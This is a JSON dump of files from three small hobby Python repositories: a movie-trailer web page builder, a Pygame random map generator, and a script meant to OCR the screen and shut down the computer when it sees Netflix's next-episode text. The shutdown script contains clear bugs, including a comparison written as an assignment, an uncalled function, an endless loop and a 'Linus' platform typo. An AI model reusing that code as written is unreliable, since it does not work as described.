[ { "alpha_fraction": 0.533812940120697, "alphanum_fraction": 0.5546762347221375, "avg_line_length": 42.4375, "blob_id": "d678af467983e42e6ddffa6e742cd19a0d265b46", "content_id": "4557fd704425d126a72d11cc6c5818b75f2ca682", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1390, "license_type": "no_license", "max_line_length": 76, "num_lines": 32, "path": "/entertainment_center.py", "repo_name": "StefanM98/Project-Movie-Trailer-Website", "src_encoding": "UTF-8", "text": "import media\nimport fresh_tomatoes\n\n# Create new instances of the Movie class for each movie\nmoana = media.Movie(\"Moana\",\n \"https://upload.wikimedia.org/wikipedia/en/2/26/\"\n \"Moana_Teaser_Poster.jpg\",\n \"https://youtu.be/LKFuXETZUsI\")\n\nzootopia = media.Movie(\"Zootopia\",\n \"https://upload.wikimedia.org/wikipedia/en/thumb/\"\n \"e/ea/Zootopia.jpg/220px-Zootopia.jpg\",\n \"https://youtu.be/jWM0ct-OLsM\")\n\ndeadpool = media.Movie(\"Deadpool\",\n \"https://upload.wikimedia.org/wikipedia/en/4/46/\"\n \"Deadpool_poster.jpg\",\n \"https://youtu.be/ONHBaC-pfsk\")\ndumb_and_dumber = media.Movie(\"Dumb and Dumber\",\n \"https://images-na.ssl-images-amazon.com/\"\n \"images/I/51XVZYDA0ZL.jpg\",\n \"https://youtu.be/l13yPhimE3o\")\nwalle = media.Movie(\"WALL-E\",\n \"http://www.gstatic.com/tv/thumb/movieposters/\"\n \"174374/p174374_p_v8_ab.jpg\",\n \"https://youtu.be/vbLNOFbsRow\")\n\n# Place all our movies into an array\nmovies = [moana, zootopia, deadpool, dumb_and_dumber, walle]\n\n# Pass the movies array to the open_movies_page function to create the page\nfresh_tomatoes.open_movies_page(movies)\n" }, { "alpha_fraction": 0.6816901564598083, "alphanum_fraction": 0.6901408433914185, "avg_line_length": 21.1875, "blob_id": "523daa507d32f63ebd86ff9f47878f29c9f3c976", "content_id": "5c7e0aaaf06518367fb3288692692936742f4b34", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 355, "license_type": "no_license", "max_line_length": 78, "num_lines": 16, "path": "/README.txt", "repo_name": "StefanM98/Project-Movie-Trailer-Website", "src_encoding": "UTF-8", "text": "Movie Trailer Website\n=====================\n\nTo Run:\n-------\n\n1. Ensure Python is installed\n2. Open the containing folder\n3. Double click entertainment_center.py\n\nDescription:\n------------\n\nThis program will store a list of your favorite movies, including their names,\nbox art imagery, and a movie trailer URL. It will then serve this data as a\nweb page.\n" }, { "alpha_fraction": 0.6754966974258423, "alphanum_fraction": 0.6754966974258423, "avg_line_length": 32.55555725097656, "blob_id": "a8d28ccd96fe05d1a50c0efac8034f674c59fdf7", "content_id": "8899911abd50ad312af7173a68555510c1a703cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 302, "license_type": "no_license", "max_line_length": 65, "num_lines": 9, "path": "/media.py", "repo_name": "StefanM98/Project-Movie-Trailer-Website", "src_encoding": "UTF-8", "text": "\"\"\"Define the Movie class which gives us the basic format of each\nmovie instance upon initalization.\"\"\"\n\n\nclass Movie():\n def __init__(self, movie_title, box_art, trailer_link):\n self.title = movie_title\n self.poster_image_url = box_art\n self.trailer_youtube_url = trailer_link\n" } ]
3
JMRedford/Lair-Generator
https://github.com/JMRedford/Lair-Generator
dbaca3056941e638bbd6e3f06cb56ea0ed74159a
f1b3588eebd3ec2819a621772e9f96d02a49c378
f8b1aacd627ac18dbdc4fcf85aa52f538a40f558
refs/heads/master
2021-01-01T15:55:34.291765
2015-08-17T20:01:52
2015-08-17T20:01:52
40,559,062
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.804347813129425, "alphanum_fraction": 0.804347813129425, "avg_line_length": 10.75, "blob_id": "9ba13eae77e5a49e82bb01ca270e330f4896fbde", "content_id": "68e1e25df37a0cf9ae128bf41b141b7be40669a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 46, "license_type": "no_license", "max_line_length": 16, "num_lines": 4, "path": "/README.md", "repo_name": "JMRedford/Lair-Generator", "src_encoding": "UTF-8", "text": "# Lair-Generator\n\ndependencies :\npython-pygame" }, { "alpha_fraction": 0.5008460283279419, "alphanum_fraction": 0.592780590057373, "avg_line_length": 27.59677505493164, "blob_id": "6c0a2c5371a1075c8d9cf49d4caf14ea4f2c57d8", "content_id": "a42e98d9a61ab5438aef180422d80fa227a0f06e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1773, "license_type": "no_license", "max_line_length": 148, "num_lines": 62, "path": "/Lair.py", "repo_name": "JMRedford/Lair-Generator", "src_encoding": "UTF-8", "text": "import pygame, time, random, math\n\nrandom.seed()\n\nxBlocks = 50\nyBlocks = 40\nblockSize = 10\n\nGREY = (200,200,200)\n\npygame.init()\ndisp = pygame.display.set_mode([xBlocks*blockSize,yBlocks*blockSize],pygame.NOFRAME)\n\nmodel = []\nprobs = [[1,0,0,0],[0.5,0.22,0.06,0.22],[0.45,0.23,0.09,0.23],[0.4,0.23,0.14,0.23],[0.35,0.23,0.19,0.23],[0.3,0.24,0.22,0.24],[0.25,0.25,0.25,0.25]]\n\nfor i in range(0,xBlocks):\n model.append([])\n for j in range(0,yBlocks):\n model[i].append([pygame.Rect(i*blockSize,j*blockSize,blockSize,blockSize),0])\n\nmodel[xBlocks/2][yBlocks-2][1] = 1\n\ndef updateModel():\n pos = (xBlocks/2,yBlocks-2)\n lastDir = (0,-1)\n while model[pos[0]][pos[1]][1] > 0:\n randNum = random.random()\n if randNum < probs[min(yBlocks-2-pos[1],6)][0]:\n lastDir = (0,-1)\n pos = (pos[0],pos[1]-2)\n elif randNum < probs[min(yBlocks-2-pos[1],6)][0] + probs[min(yBlocks-2-pos[1],6)][1]:\n lastDir = (1,0)\n pos = (pos[0]+2,pos[1])\n elif randNum < probs[min(yBlocks-2-pos[1],6)][0] + probs[min(yBlocks-2-pos[1],6)][1] + probs[min(yBlocks-2-pos[1],6)][2]:\n lastDir = (0,1)\n pos = (pos[0],pos[1]+2)\n else: \n lastDir = (-1,0)\n pos = (pos[0]-2,pos[1])\n model[pos[0]][pos[1]][1] = 1\n model[pos[0]-lastDir[0]][pos[1]-lastDir[1]][1] = 1\n print('update model')\n\ndef updateView():\n for i in range(0,xBlocks):\n for j in range(0,yBlocks):\n if model[i][j][1] == 1:\n surf = pygame.Surface((blockSize,blockSize))\n surf.fill(GREY)\n disp.blit(surf,model[i][j][0])\n pygame.display.flip()\n\nwhile(1):\n e = pygame.event.poll()\n if (e.type == pygame.KEYDOWN and e.key == pygame.K_ESCAPE):\n break\n if (e.type == pygame.KEYDOWN and e.key == pygame.K_PERIOD):\n updateModel()\n updateView()\n\npygame.quit()\n" } ]
2
RinaldoBoeje/AntiNetflixAddiction
https://github.com/RinaldoBoeje/AntiNetflixAddiction
7217a10ac9a9235bdc42d90c277212cc3092e0bf
58b2617ba1cf1b74b2d843ed4017213e6382218a
40b73c24befe85a8ef37a7e9055da80217ef1859
refs/heads/master
2023-07-05T16:06:04.115918
2021-08-09T19:40:19
2021-08-09T19:40:19
394,406,678
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6247411966323853, "alphanum_fraction": 0.6366459727287292, "avg_line_length": 25.600000381469727, "blob_id": "024e6e1e5f48652f08868945c46bae771b1e5dd5", "content_id": "4b08447b05a65c0fcbbc55ef40fd51399e64f74f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1932, "license_type": "no_license", "max_line_length": 90, "num_lines": 70, "path": "/src/main.py", "repo_name": "RinaldoBoeje/AntiNetflixAddiction", "src_encoding": "UTF-8", "text": "#Information sources: \r\n#https://www.geeksforgeeks.org/python-using-pil-imagegrab-and-pytesseract/\r\n\r\n#steps: \r\n#1: using PIL (imageGrab) take a shot of the screen\r\n#2: using pyTesseract look on screen for x\r\n# x = inputted Text\r\n#3: if x is found, start a 15 second countdown to \"application\" shutdown. Or \"pc\" shutdown\r\n# make compatible with Windows and Linux machines, Fuck Mac OSX\r\n\r\nimport os\r\nimport platform\r\nimport numpy as nm\r\nimport pytesseract\r\nimport cv2\r\nfrom PIL import ImageGrab\r\n\r\n\r\ninput == \"Next Episode\"\r\n\r\n#Take image of screen\r\ndef screenGrab():\r\n #take image of screen\r\n #TODO: Remove\r\n print(\"screenGrab test\")\r\n foundString = \"placeholder\"\r\n\r\n # Path of tesseract executable\r\n pytesseract.pytesseract.tesseract_cmd ='**Path to tesseract executable**'\r\n while(True):\r\n \r\n # ImageGrab-To capture the screen image in a loop. \r\n # Bbox used to capture a specific area.\r\n cap = ImageGrab.grab(bbox =(700, 300, 1400, 900))\r\n \r\n # Converted the image to monochrome for it to be easily \r\n # read by the OCR and obtained the output String.\r\n foundString = pytesseract.image_to_string(\r\n cv2.cvtColor(nm.array(cap), cv2.COLOR_BGR2GRAY), \r\n lang ='eng')\r\n print(foundString)\r\n\r\n return foundString\r\n\r\n\r\n#look on screen for x\r\ndef screenSearch(inputString, foundString):\r\n #search on screen\r\n #TODO: Remove\r\n if inputString == foundString:\r\n systemShutdown\r\n\r\n\r\n#shutdown system\r\ndef systemShutdown():\r\n system = platform.system()\r\n\r\n if system == 'Windows':\r\n #Windows based\r\n os.system(\"shutdown /s /t 1\") \r\n elif system == 'Linus' or system == 'Darwin':\r\n #unix based\r\n os.system(\"poweroff\")\r\n else:\r\n #fucking try unix based shit again\r\n os.system(\"shutdown now -h\")\r\n\r\n#main\r\ndef main():\r\n screenSearch(input, screenGrab())\r\n" } ]
1